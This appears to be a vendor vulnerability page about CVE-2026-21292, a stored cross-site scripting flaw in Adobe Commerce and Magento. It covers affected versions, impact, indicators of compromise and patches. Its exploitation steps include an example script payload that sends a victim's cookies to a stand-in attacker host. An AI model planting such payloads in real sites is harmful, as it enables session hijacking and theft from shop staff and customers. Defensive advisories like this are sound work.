CVE-2026-21292
Adobe Commerce vulnerability analysis and mitigation

Overview

CVE-2026-21292 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. The vulnerability affects Adobe Commerce and Magento Open Source versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and all earlier versions; Adobe Commerce B2B is also affected across multiple versions. It was disclosed on March 10–11, 2026, via Adobe's security advisory APSB26-05. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored (persistent) variant. An attacker with low-level authenticated access can inject malicious JavaScript or HTML into vulnerable form fields within the Adobe Commerce admin or storefront; the payload is stored server-side and subsequently rendered in the browsers of other users who visit the affected page. Exploitation requires user interaction — a victim must navigate to the page containing the injected content for the script to execute. No specific technical write-up or public PoC code has been identified at this time (Adobe Advisory, Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The changed scope (S:C in the CVSS vector) indicates the impact extends beyond the attacker's own session to affect other users. While confidentiality and integrity impacts are rated Low and availability is unaffected, the risk is amplified in e-commerce environments where admin or customer sessions may expose payment data, order details, or account credentials (Adobe Advisory, Feedly).

Exploitation steps

  1. Gain low-privileged access: Obtain a low-privileged account on the target Adobe Commerce or Magento instance (e.g., a restricted admin role or a registered customer account with access to form fields).
  2. Identify vulnerable form fields: Navigate to pages within the Commerce admin panel or storefront that contain input fields susceptible to stored XSS (e.g., product reviews, customer profile fields, or admin-facing input forms).
  3. Inject malicious payload: Submit a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save/submit the form.
  4. Wait for victim interaction: The payload is stored server-side. When an administrator or another user browses to the page containing the injected field, the malicious script executes in their browser.
  5. Harvest results: The attacker's script can exfiltrate session cookies, capture credentials entered on the page, or perform actions (e.g., creating admin accounts, modifying orders) on behalf of the victim (Adobe Advisory).

Indicators of compromise

  • Logs: Web server or application logs showing unusual POST requests to form submission endpoints containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, javascript:) in field values; repeated access to specific admin or storefront pages by unfamiliar user accounts.
  • Network: Outbound HTTP/S requests from victim browsers to unknown external domains shortly after visiting specific Commerce pages; DNS queries to attacker-controlled domains originating from end-user systems.
  • File System: No direct file system artifacts expected for a stored XSS attack; however, review the Commerce database for unexpected script content stored in product, customer, or CMS page fields.
  • Application: Unexpected changes to admin accounts, customer data, or order records that correlate with user sessions visiting affected pages; anomalous session activity in Commerce logs following visits to pages with stored content.

Mitigation and workarounds

Adobe has released patched versions addressing this vulnerability: Adobe Commerce 2.4.9-alpha3 (fixed), 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, and 2.4.4-p16 — administrators should upgrade to these versions or later immediately (Adobe Advisory). As interim mitigations, implement a strict Content Security Policy (CSP) to restrict unauthorized script execution, and enforce rigorous server-side input validation and output encoding on all user-supplied form fields. Restrict low-privileged user access to sensitive form fields where possible, and monitor application logs for suspicious input patterns.

Community reactions

The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the March 2026 update cycle, including this CVE (CIS Advisory). Coverage was also noted on security aggregation platforms such as BeyondMachines and CVEFeed shortly after disclosure. No notable individual researcher commentary or significant social media discussion has been identified beyond routine CVE tracking posts.

Additional resources


SourceThis report was generated using AI

Related Adobe Commerce vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48358CRITICAL10
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48356CRITICAL9.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48000MEDIUM6.1
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48371MEDIUM5.4
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48001LOW3.7
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management